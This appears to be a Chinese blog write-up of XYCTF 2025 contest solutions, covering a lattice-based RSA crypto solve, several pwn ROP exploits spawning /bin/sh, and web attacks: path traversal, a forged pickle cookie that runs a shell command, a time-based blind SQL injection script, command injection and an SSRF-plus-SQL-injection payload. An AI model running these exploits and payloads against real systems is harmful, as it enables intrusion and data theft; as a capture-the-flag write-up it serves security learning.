    """Raise *c* to *exp* by square-and-multiply, reducing both parts mod *n*.

    Returns Complex(1, 0) when exp is 0 or negative. The argument *c* itself
    is not modified.
    """
    acc = Complex(1, 0)
    base = c
    while exp > 0:
        if exp & 1:
            stepped = acc * base
            acc = Complex(stepped.re % n, stepped.im % n)
        squared = base * base
        base = Complex(squared.re % n, squared.im % n)
        exp >>= 1
    return acc

def Small_roots(f, bounds, m=1, d=None):
    """Search for small roots of the multivariate polynomial f modulo N (lattice + LLL).

    f      -- polynomial over a ring R; N = R.cardinality() is used as the modulus
    bounds -- one size bound per variable; every monomial is evaluated at the
              bounds to scale the matching lattice column
    m      -- highest power of f used for the shift polynomials
    d      -- exclusive upper limit for each variable's shift exponent
              (defaults to f.degree())

    Returns a list of root tuples with entries in R, or [] when none is found.
    In this file `^` is exponentiation (Sage syntax), not XOR.
    """
    if not d:
        d = f.degree()
    R = f.base_ring()
    N = R.cardinality()
    # Divide f by the first entry of f.coefficients(), then lift it to ZZ.
    f /= f.coefficients().pop(0)
    f = f.change_ring(ZZ)
    G = Sequence([], f.parent())
    # Shift polynomials: N^(m-i) * f^i times every monomial whose exponents
    # are all below d.
    for i in range(m + 1):
        base = N ^ (m - i) * f ^ i
        for shifts in itertools.product(range(d), repeat=f.nvariables()):
            g = base * prod(map(power, f.variables(), shifts))
            G.append(g)
    # Coefficient matrix of the shift polynomials and the monomials that
    # label its columns.
    B, monomials = G.coefficient_matrix()
    monomials = vector(monomials)
    # Scale each column by its monomial evaluated at the bounds, reduce with
    # LLL, then undo the scaling.
    factors = [monomial(*bounds) for monomial in monomials]
    for i, factor in enumerate(factors):
        B.rescale_col(i, factor)
    B = B.dense_matrix().LLL()
    B = B.change_ring(QQ)
    for i, factor in enumerate(factors):
        B.rescale_col(i, 1 / factor)
    H = Sequence([], f.parent().change_ring(QQ))
    # Add the reduced polynomials one at a time (zero rows are filtered out)
    # until the ideal they generate has dimension 0.
    for h in filter(None, B * monomials):
        H.append(h)
        I = H.ideal()
        if I.dimension() == -1:
            # Dimension -1: discard the polynomial that was just added.
            H.pop()
        elif I.dimension() == 0:
            # Dimension 0: read the integer solutions off the variety and map
            # each coordinate back into R.
            roots = []
            for root in I.variety(ring=ZZ):
                root = tuple(R(root[var]) for var in f.variables())
                roots.append(root)
            return roots
    return []

n = 24240993137357567658677097076762157882987659874601064738608971893024559525024581362454897599976003248892339463673241756118600994494150721789525924054960470762499808771760690211841936903839232109208099640507210141111314563007924046946402216384360405445595854947145800754365717704762310092558089455516189533635318084532202438477871458797287721022389909953190113597425964395222426700352859740293834121123138183367554858896124509695602915312917886769066254219381427385100688110915129283949340133524365403188753735534290512113201932620106585043122707355381551006014647469884010069878477179147719913280272028376706421104753
mh = [3960604425233637243960750976884707892473356737965752732899783806146911898367312949419828751012380013933993271701949681295313483782313836179989146607655230162315784541236731368582965456428944524621026385297377746108440938677401125816586119588080150103855075450874206012903009942468340296995700270449643148025957527925452034647677446705198250167222150181312718642480834399766134519333316989347221448685711220842032010517045985044813674426104295710015607450682205211098779229647334749706043180512861889295899050427257721209370423421046811102682648967375219936664246584194224745761842962418864084904820764122207293014016, 15053801146135239412812153100772352976861411085516247673065559201085791622602365389885455357620354025972053252939439247746724492130435830816513505615952791448705492885525709421224584364037704802923497222819113629874137050874966691886390837364018702981146413066712287361010611405028353728676772998972695270707666289161746024725705731676511793934556785324668045957177856807914741189938780850108643929261692799397326838812262009873072175627051209104209229233754715491428364039564130435227582042666464866336424773552304555244949976525797616679252470574006820212465924134763386213550360175810288209936288398862565142167552]
C = [5300743174999795329371527870190100703154639960450575575101738225528814331152637733729613419201898994386548816504858409726318742419169717222702404409496156167283354163362729304279553214510160589336672463972767842604886866159600567533436626931810981418193227593758688610512556391129176234307448758534506432755113432411099690991453452199653214054901093242337700880661006486138424743085527911347931571730473582051987520447237586885119205422668971876488684708196255266536680083835972668749902212285032756286424244284136941767752754078598830317271949981378674176685159516777247305970365843616105513456452993199192823148760, 21112179095014976702043514329117175747825140730885731533311755299178008997398851800028751416090265195760178867626233456642594578588007570838933135396672730765007160135908314028300141127837769297682479678972455077606519053977383739500664851033908924293990399261838079993207621314584108891814038236135637105408310569002463379136544773406496600396931819980400197333039720344346032547489037834427091233045574086625061748398991041014394602237400713218611015436866842699640680804906008370869021545517947588322083793581852529192500912579560094015867120212711242523672548392160514345774299568940390940653232489808850407256752]
enc = b'\x9c\xc4n\x8dF\xd9\x9e\xf4\x05\x82!\xde\xfe\x012$\xd0\x8c\xaf\xfb\rEb(\x04)\xa1\xa6\xbaI2J\xd2\xb2\x898\x11\xe6x\xa9\x19\x00pn\xf6rs- \xd2\xd1\xbe\xc7\xf51.\xd4\xd2 \xe7\xc6\xca\xe5\x19\xbe'
# The two values given in mh; the unknown parts a and b are added to them below.
H1, H2 = mh
# a and b are the variables of a polynomial ring over Z/nZ.
R.<a, b> = PolynomialRing(Zmod(n))
m = Complex(H1+a, H2+b)
e = 3
# Cube of m with both parts reduced mod n: c0 and c1 are polynomials in a, b.
c0, c1 = complex_pow(m, e, n).tolist()
# Real part of C times its conjugate, mod n. Only the commented-out relation
# on the next line refers to it.
cc = (Complex(C[0], C[1])*Complex(C[0], -C[1])).tolist()[0]%n
# f = c0**2-c1**2-cc
# Relation actually used: real part plus imaginary part of m^e must equal
# C[0] + C[1].
f = c0+c1-C[0]-C[1]
# f = a^3 + 3*a^2*b + 24240993137357567658677097076762157882987659874601064738608971893024559525024581362454897599976003248892339463673241756118600994494150721789525924054960470762499808771760690211841936903839232109208099640507210141111314563007924046946402216384360405445595854947145800754365717704762310092558089455516189533635318084532202438477871458797287721022389909953190113597425964395222426700352859740293834121123138183367554858896124509695602915312917886769066254219381427385100688110915129283949340133524365403188753735534290512113201932620106585043122707355381551006014647469884010069878477179147719913280272028376706421104750*a*b^2 - b^3 + 8561230439391494652964518079446866842028983721243871740678085235648991512859872293006057125946195621933460646577683274888911938749947557410456108560903123308064214736765941945738775653721483764217371543335053845725104842641255359216126438087575748363812755658467878613009428632965461891901240897234636188930235282197189301164406617550554690260556986611562066604124144832597773727110574037779927891595935693982966830195674965362451719533630740904542001614547907337380053585804136986902195402489249460519464000870105805136557334600320113259559943913383018435361217217104812738179655056392017057962783432200904463335198*a^2 + 6163799086663089962922878486960603142634653538500224574832263309440400229663429444570933160280165674448658503594787869647336933393720197549431618115096044569161176249548202319676097265865134657809473896391215120739767015838378744420378342497449899073039539146408914174451544338926849687587831995410255864815701686178843374965444666563981900463161918999438376904095758736775640077425796056312967479913525078770895606917077380117257738733072179942037031959709220473324555473244613738718787227651478347323106867852590532126128479231814921669949192426355051363233877106237061402904328257094614989652010276687972168393043*a*b + 
15679762697966073005712578997315291040958676153357192997930886657375568012164709069448840474029807626958878817095558481229689055744203164379069815494057347454435594034994748266103161250117748344990728097172156295386209720366668687730275778296784657081783099288677922141356289071796848200656848558281553344705082802335013137313464841246733030761832923341628046993301819562624652973242285702513906229527202489384588028700449544333151195779287145864524252604833520047720634525110992297047144731035115942669289734664184706976644598019786471783562763441998532570653430252779197331698822122755702855317488596175801957769555*b^2 + 8582315269410774124823258095478638178400311338560576630170632792087826268541848192157284161775144141390466950130002880062929754436334772569409319879709529362955091119713278408599807595588291629302014979201344547010038900810178552429321583393544411216874629359260251433015427350406719033660758322297664710302803080884510007292884545686747353200444929485345063906619923592883942046920924037295178396626395542817350280717218663940179156863901518943815489142519766272616280029940228109891973565352582586997816034329477858678872073912458740936516437948386921875997037630996851903247129500893656525306719940410016725344963*a + 9066702840505699658953639629049021586916363316170704417649115572876309712531356189172030182617604403951747329772530572036914069246050371461129464183292120480687494873848837951165017111995384704238710809368220281252728347967513567280702968114168708629246003495756610542054418871944250402793677442419990580751321411501359378894627370595956209386973974699638050558218349345229260540918407359009979814836175788585813509503761192618177925809599677209102109929913853634890558975293814075446507981374306918776717379220717945656050077399293768358753505649971575739045815663571359392939841395387283696158734529803863089540947*b + 
4805774750765038061327556884398652536344606373367627677111485580490062182765687888710315961663704027282741591779241278727300067702107160563887395488716230827474053953433814243850092109681699617928281456674297264619080170357774519373012998020671222354556601140408549885753694431420033201910809797935451695258585846751385900277218096178916147879419695528842812780786662970149357673762169798068711274549067281725249613496222729889626404788855830317683020701073816999141217783365883823644055041860499295484600163514145831627927982650728945632980415134587925386783887549931839269502638480317130634267954398513416615988501
# Look for roots with a bound of 2**128 on each unknown and take the first
# result. NOTE: raises IndexError if Small_roots returns [].
a, b = Small_roots(f, bounds=(2**128, 2**128), m=1, d=4)[0]
m = Complex(H1+a, H2+b)
# ChaCha20 key: SHA-256 of the decimal string of (re + im); the nonce is the
# fixed 12-byte value below.
print(ChaCha20.new(key=hashlib.sha256(str(m.re + m.im).encode()).digest(), nonce=b'Pr3d1ctmyxjj').decrypt(enc))
# XYCTF{Welcome_to_XYCTF_Now_let_us_together_play_Crypto_challenge}

PWN

Ret2libc's Revenge

利用gadget中的rsi间接控制rdi,puts留下rdx为1,改stdout缓冲模式,泄露打一个ret2libc

from pwn import *
# NOTE(review): this listing is reproduced as published. It is not valid
# Python in this form (typographic quotes on two lines) and it refers to
# names that are not defined in the listing, so read it as a description of
# the chain rather than a runnable script.
contex.log_level='debug'
# `io` is assigned twice: the local process handle is replaced right away by
# the remote connection.
io = process('./pwn')
io = remote("47.94.103.208",28733)
elf = ELF(‘./pwn’)
libc = ELF("libc.so.6")
# Hard-coded code addresses inside the binary, used as gadgets.
# NOTE(review): fixed 0x40.... addresses presumably mean the binary is built
# without PIE; with PIE these constants would not be known in advance.
gadget1 = 0x0000000000401180

xor_rsi = 0x00000000004010e4

# Writable address used as the new stack area.
bss = 0x404100
rbp = 0x000000000040117d

ret =0x000000000040101a

add_rsi = 0x00000000004010eb

# First input: 0x218 filler bytes, then values that overwrite what follows
# the buffer, ending with a new frame pointer (bss+0x220) and the code
# address 0x401207.
pay=b'a'*0x218+b'\x18'+b'\x02'+b'\x00'*2+b'\x1d'+b'\x02'+b'\x00'*2+p64(bss+0x220)+p64(0x401207)
io.sendline(pay)
ret = 0x000000000040101a


# Second input: a chain that calls puts and setvbuf through the PLT. Per the
# author's summary this changes stdout buffering so that the address printed
# by puts reaches the client.
pay=b'a'*(0x1f8)+p64(0x404060)+p64(elf.got['puts'])+p64(0)*2+b'\x18'+b'\x02'+b'\x00'*2+b'\x1d'+b'\x02'+b'\x00'*2+p64(0x4042e0)+p64(xor_rsi)+p64(add_rsi_rbp20)+p64(gadget1)+p64(elf.plt['puts'])+p64(rbp)+p64(0x4042c0)+p64(xor_rsi)+p64(add_rsi)+p64(gadget1)+p64(xor_rsi)+p64(elf.plt['setvbuf'])+p64(rbp)+p64(bss+0x420)+p64(0x401207)
io.sendline(pay)
# Read up to the first 0x7f byte, keep the last 6 bytes as the leaked puts
# address and derive the libc base from it.
puts = u64(io.recvuntil(b’\x7f’)[-6:])
libc.address = puts - libc.sym['puts']
system = libc.sym['system']
# Third input: same layout, now ending in the libc system address repeated
# 0x41 times followed by the "/bin/sh" string.
pay=b'a'*(0x1f8)+p64(0x404758)+p64(elf.got['puts'])+p64(0)*2+b'\x18'+b'\x02'+b'\x00'*2+b'\x1d'+b'\x02'+b'\x00'*2+p64(0x4044d8)+p64(xor_rsi)+p64(add_rsi)+p64(gadget1)+p64(ret)+p64(ret) +p64(system)*0x41+b'/bin/sh\x00'
io.sendline(pay)



io.interactive()

EZ3.0

from pwn import *
# Local debugging variant (kept commented out): the binary under qemu-mipsel
# with a gdb stub on port 6666.
# io = process(["qemu-mipsel","-L","/usr/mipsel-linux-gnu/",'-g','6666',"./pwn"])
io = remote('47.94.172.18',22709)

# Hard-coded code addresses inside the binary.
system = 0x400B70
gadget = 0x0400A20
# The string literal below is not executed; it records the instructions found
# at `gadget`: load $a0 from 8($sp), load $t9 from 4($sp), jump to $t9.
'''
lw      $a0, 8($sp)
lw      $t9, 4($sp)
jalr    $t9
nop
'''
# 0x1c+8 filler bytes followed by the gadget address: 0x28 bytes in total.
pay = b'a'*(0x1c+8)+p32(gadget)
# ljust(0x28) changes nothing (the payload is already 0x28 bytes long). The
# three words appended are a filler, the system address and the constant
# 0x3fff808c; presumably they sit at 0($sp), 4($sp) and 8($sp) when the
# gadget runs — TODO confirm against the binary.
# NOTE(review): 0x3fff808c is a fixed address, so the script depends on the
# target's memory layout not being randomized.
pay = pay.ljust(0x28,b'a')+b'bbbb'+p32(system)+p32(0x3fff808c)
io.sendlineafter('> ',pay)


io.interactive()

明日方舟寻访模拟器

Exp:

# Excerpt only: `io`, `bss_start`, `magic` and `system` are defined in a part
# of the script that is not shown here.
ret = 0x000000000040101a
# First input, sent after the name prompt: 0x40 filler bytes, a new frame
# pointer (bss_start+0x40), the address `magic` and two zero words.
pay = b'a'*0x40+p64(bss_start+0x40)+p64(magic)+p64(0)*2
io.sendafter('请输入你的名字:\n',pay)
# Second input: a short chain ending in the system address and a "/bin/sh"
# string, padded to 0x40 bytes and followed by bss_start and the code
# address 0x40191B.
pay2 = p64(0)+p64(0x00000000004018e5)+p64(bss_start+0x28)+p64(ret)+p64(system)+b'/bin/sh\x00'
pay2 = pay2.ljust(0x40)+p64(bss_start)+p64(0x40191B)
io.sendline(pay2)
io.interactive()

WEB

Signin

通过查看附件发现里面有任意文件读取漏洞,绕过方式为:
/download?filename=./.././../secret.txt
然后查看发现bottle的cookie使用pickle序列化

让ai根据bottle的代码写个反序列化构造
import pickle, base64, hmac, hashlib
# NOTE(review): root cause on the server side — the cookie value is
# unpickled once its HMAC verifies, so anyone who learns the secret can make
# the server unpickle arbitrary data. Fixes: do not store pickled data in
# cookies (use a data-only format such as JSON), and close the file-read bug
# that exposed secret.txt.
tut = b'Hell0_H@cker_Y0u_A3r_Sm@r7' # contents of secret.txt, read through the file-read bug
digestmod = hashlib.sha256 
# `msg` is not used anywhere below.
msg=''
# Hand-written pickle stream; unpickling it runs the shell command it embeds.
payload = b'''cos
system
(S'cat /f* > flag.txt'
tR.'''
payload_b64 = base64.b64encode(payload)
# The signature is HMAC-SHA256 over the Base64 text of the payload, keyed
# with the leaked secret.
sig = hmac.new(tut, payload_b64, digestmod=digestmod).digest()
sig_b64 = base64.b64encode(sig)
# Cookie value layout: "!" + Base64(signature) + "?" + Base64(payload).
value_to_pass = f"!{sig_b64.decode()}?{payload_b64.decode()}"
print(value_to_pass)

生成的恶意cookie:

把恶意cookie写入数据包,访问/secret 让执行反序列化漏洞

在通过任意文件读取漏洞读取/download?filename=flag.txt

flag{We1c0me_t0_XYCTF_2o25!The_secret_1s_L@men7XU_L0v3_u!}

ez_puzzle

手动拼,在拼出来的一瞬间在控制台输入:startTime = Date.now() - 1900;

ezsql

访问一个登录框,测测有没有sql注入

经过一波测试,大概过滤了& * || and union like handler等等
于是想到sql盲注的思路进行注入
写一个盲注的脚本

import requests
import time


def bool_blind_injection():
    """Read a string out of the database one character at a time and print it.

    Despite the name, the oracle is response time, not a difference in the
    page: the injected condition calls sleep(5) when it is true, and a reply
    slower than 2 seconds is taken as "true".

    NOTE(review): seen from the server, these requests are easy to spot —
    SQL keywords separated by %09 (tab) inside the username field, and
    replies that take about 5 seconds. The underlying fix is a parameterized
    query in the login handler; a keyword blacklist does not stop this.
    """
    result = ""
    url = "http://eci-2ze7pu55q45bh9tllk04.cloudeci1.ichunqiu.com/login.php"
    headers = {
    "Content-Type": "application/x-www-form-urlencoded"
    }
    
    for current_position in range(1, 50):
        # NOTE(review): `found` is never set to True, so the `else: break`
        # after the while loop cannot run and all 49 positions are always
        # tried.
        found = False
        # Binary search over printable ASCII (33..126) to speed up guessing
        low, high = 33, 126
        while low <= high and not found:
            mid = (low + high) // 2
            # The body is sent as a pre-built string; the condition
            # "character code > mid" decides whether sleep(5) runs.
            payload = f"username=12'^case%09when%09(ascii(substr(database()%09from%09{current_position}%09for%091))>{mid})%09then%09sleep(5)%09else%090%09end#&password=123456"
            start_time = time.time()
            try:
                r = requests.post(url, data=payload, headers=headers, timeout=8)
                print(r.request.body)
                # print(r.text.encode('utf-8'))
                elapsed = time.time() - start_time
                
                # Slow reply: condition was true, the character code is above mid.
                if elapsed > 2:
                    low = mid + 1
                else:
                    high = mid - 1
            except:
                # NOTE(review): a bare except that retries with unchanged
                # bounds; if the request keeps failing this loops forever and
                # also hides KeyboardInterrupt.
                continue

        if low > high:
            result += chr(low)
            print(f"[+] 当前的结果: {result}")
        else:
            break
    
    print(f"[!] 最终的结果: {result}")

bool_blind_injection()


跑出了数据库testdb
更换脚本里面的payload,进行爆破表名
payload = f"username=12'^case%09when%09(ascii(substr((select%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema='testdb')%09from%09{current_position}%09for%091))>{mid})%09then%09sleep(5)%09else%090%09end#&password=123456"

发现有两个表名double_check,user,进入user表查看里面的列名
payload = f"username=12'^case%09when%09(ascii(substr((select%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_name='user')%09from%09{current_position}%09for%091))>{mid})%09then%09sleep(5)%09else%090%09end#&password=111"

发现里面存在
username,password
后面还有很多,中途容器不小心停掉了,就不列出来了

爆破username、password的值,得到账号密码

username:yudeyoushang

password:zhonghengyisheng
登录进去之后

发现还需要key,猜测是不是可能在另外一个表里面,于是爆破double_check表里面的列名

发现里面存在secret列名,于是进行爆破这个值
dtfrtkcc0czkoua9S

输入key之后,进去发现

这是个简单的rce,
Payload:cat${IFS}/flag.txt>test.txt
执行完之后,直接访问test.txt文件

得到答案
XYCTF{77e38007-64a6-42ba-83f6-8ff58d3fd0d5}

FATE

分析代码,首先是:
@app.route('/proxy', methods=['GET'])
def nolettersproxy():
url = flask.request.args.get('url')
if not url:
return flask.abort(400, 'No URL provided')
target_url = "http://lamentxu.top" + url
for i in blacklist:
路由为/proxy,参数为url,由于url前拼接了域名,要加@绕过,组合后为http://lamentxu.top@127.0.0.1:8080
然后是这个代码
@app.route('/1337', methods=['GET'])
def api_search():

if flask.request.remote_addr == '127.0.0.1':
    code = flask.request.args.get('0')
    if code == 'abcdefghi':
        req = flask.request.args.get('1')
        try:
            req = binary_to_string(req)
            print(req)
            req = json.loads(req) # No one can hack it, right? Pickle unserialize is not secure, but json is ;)
        except:
            flask.abort(400, "Invalid JSON")
        if 'name' not in req:
            flask.abort(400, "Empty Person's name")
        name = req['name']
        if len(name) > 6:
            flask.abort(400, "Too long")
        if '\'' in name:
            flask.abort(400, "NO '")
        if ')' in name:
            flask.abort(400, "NO )")
        """
        Some waf hidden here ;)
        """

可以看到想要本地访问可以造成ssrf漏洞,但有过滤,可以用127.0.0.1的十进制2130706433来绕过,然后abcdefghi可以用二次url编码绕过

然后执行sql语句
cur.execute(f"SELECT FATE FROM FATETABLE WHERE NAME=UPPER(UPPER(UPPER(UPPER(UPPER(UPPER(UPPER('{code}')))))))")
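由于代码是将解析后的字段值直接拼进sql查询,而前面的检查都把name当成字符串:name是一个对象时,len(name)算的是键的个数,in判断的是有没有这个键,长度和引号、括号的检查就都通过了。所以在name里也嵌套一个对象,然后根据闭合构造poc:{ "name": { "))))))) union select FATE FROM FATETABLE WHERE NAME= \"LAMENTXU\" --+": "ctf" } }(修复思路:校验name必须是字符串,并使用参数化查询。)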

由于过滤了一些符号所以用二进制对poc进行转换绕过,最后拼接前面的ssrf利用payload,
?url=@2130706433:8080/1337?0=%2561%2562%2563%2564%2565%2566%2567%2568%2569%261=011110110000101000100000001000000010001001101110011000010110110101100101001000100011101000100000011110110000101000100000001000000010000000100000001000100010100100101001001010010010100100101001001010010010100100100000011101010110111001101001011011110110111000100000011100110110010101101100011001010110001101110100001000000100011001000001010101000100010100100000010001100101001001001111010011010010000001000110010000010101010001000101010101000100000101000010010011000100010100100000010101110100100001000101010100100100010100100000010011100100000101001101010001010011110100100000010111000010001001001100010000010100110101000101010011100101010001011000010101010101110000100010001000000010110100101101001010110010001000111010001000000010001001100011011101000110011000100010000010100010000000100000011111010000101001111101

版权属于:

霍雅的博客

本文链接:

https://6666345.xyz/bk/index.php/archives/237/(转载时请注明本文出处及文章链接)
